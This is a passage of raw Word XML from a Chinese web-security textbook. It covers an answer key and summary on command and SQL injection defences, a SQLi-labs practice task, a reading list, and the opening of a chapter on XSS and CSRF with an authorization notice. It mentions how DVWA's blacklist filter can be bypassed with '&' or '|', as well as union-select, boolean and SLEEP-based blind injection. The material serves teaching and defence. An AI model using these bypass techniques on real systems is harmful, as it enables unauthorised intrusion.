          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的过滤规则及其绕过方式。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="184"/>
    <w:bookmarkStart w:id="185" w:name="解答要点"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数化查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">首先将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模板发送至数据库进行编译，随后传入参数作为纯数据绑定到占位符上。数据永远不会被解析为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字或操作符，因此任何特殊字符都被视为字面值。转义函数则试图通过替换危险字符（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）来预防注入，但极易因编码方式、上下文不同或疏忽而被绕过，且不能保证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 100% </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全。根治性在于参数化从执行模型的层面切断了数据与代码的混淆，而不是使用补丁式的字符串处理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">布尔盲注信道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者通过观察页面是否返回特定内容（如“用户存在”或“用户不存在”）来逐位推断数据。防御可统一错误页面，使所有查询无论成功与否返回相同界面，从而关闭信息泄露。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">时间盲注信道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者通过触发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SLEEP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等函数造成可测量的响应延迟来推断数据。防御可设置查询最大执行超时并终止超时请求，同时监控数据库慢查询日志，对特定接口的高延迟请求进行限速或封禁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1101"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">黑名单过滤依赖预设的“恶意字符串”列表，但攻击者可以通过变体（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、编码（URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码、Unicode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码）、大小写混合、插入无用字符（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|&lt;space&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）等方式绕过。DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">过滤了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但仍可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入；High</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加固后依然存在绕过可能。因此，防御必须从“禁止已知坏字符”转向“仅允许已知好字符”的白名单模型，并结合命令执行的参数化/安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="185"/>
    <w:bookmarkStart w:id="186" w:name="靶机迁移任务-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQLi‑labs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中选择第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关（POST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型注入）或第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关（双引号闭合），尝试使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">union select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和布尔盲注两种方式独立完成数据提取，并对比不同注入手段在网络流量中的表现差异（可配合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）。记录你为实现“关闭信息泄露”而进行的防御配置尝试（例如修改</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代码返回统一错误页），并测试是否能有效阻断盲注。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="186"/>
    <w:bookmarkEnd w:id="187"/>
    <w:bookmarkStart w:id="188" w:name="小结-13"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入将用户输入拼接到系统命令中，利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">元字符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）执行额外命令，与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入同属“输入即代码”的安全假设违背。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御命令注入的根本原则是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">避免拼接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，使用安全的进程调用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">API；若必须执行外部命令，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单校验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">参数化传递</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入类漏洞的纵深防御包含五层：参数化（根治）→最小权限→白名单校验→WAF（补偿控制）→数据库/应用审计与蓝队告警。任何单层都不应被视为绝对安全。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盲注利用程序可见的信道（布尔、时间）推断数据，防御方可通过统一错误页、设置查询超时、监控异常延迟等方式削弱信道。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1102"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在授权靶机中的动手实践（DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入、SQLi‑labs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">盲注）是建立攻防直觉的最有效路径，但所有操作必须遵守法律与伦理红线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="188"/>
    <w:bookmarkStart w:id="189" w:name="延伸阅读白名单-7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Stuttard–Pinto《The Web Application Hacker’s Handbook》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：第二部分第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8–10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章对注入漏洞的原理与高级技巧有系统论述，且始终兼顾防御视角。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10: A03 Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：概述注入类漏洞的分类与防范策略，与本教材的攻击树框架相呼应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Testing Guide v4.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入和命令注入的详细测试用例与检测方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PortSwigger Web Security Academy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS command injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">交互式实验模块，可与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配合强化技能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Michal Zalewski《The Tangled Web》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：辅助理解浏览器与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全边界，为理解命令注入在整体攻击面中的位置提供基石。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1103"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》馆藏系列：网络层、系统层与密码学基础已在本套教材其他卷中深入讲解，必要时交叉回指。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="189"/>
    <w:bookmarkStart w:id="192" w:name="xss-与-csrf客户端攻防"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10 XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF:客户端攻防</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="190" w:name="xss存储型反射型与-dom-型"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS:存储型、反射型与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DOM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ★</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">🚨 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明（本书铁律，必读）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所有命令与操作均为教学目的设计，读者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">必须</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅在本人搭建的隔离实验环境（例如本地虚拟机中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA、PortSwigger Web Security Academy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在线实验室，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HackTheBox/TryHackMe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等授权平台）中执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝对禁止</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对未获得书面授权的第三方系统进行任何形式的探测、注入或攻击。实验网络应与生产环境及互联网严格隔离，例如使用仅主机模式或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隔离网段。未经授权访问他人计算机系统属违法行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">📚 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节内容基于第八章“HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全要点与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suite”中已讲解的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie、会话机制及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截；需读者已搭建并能够访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶场（见第二章靶场环境搭建）。同时，XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
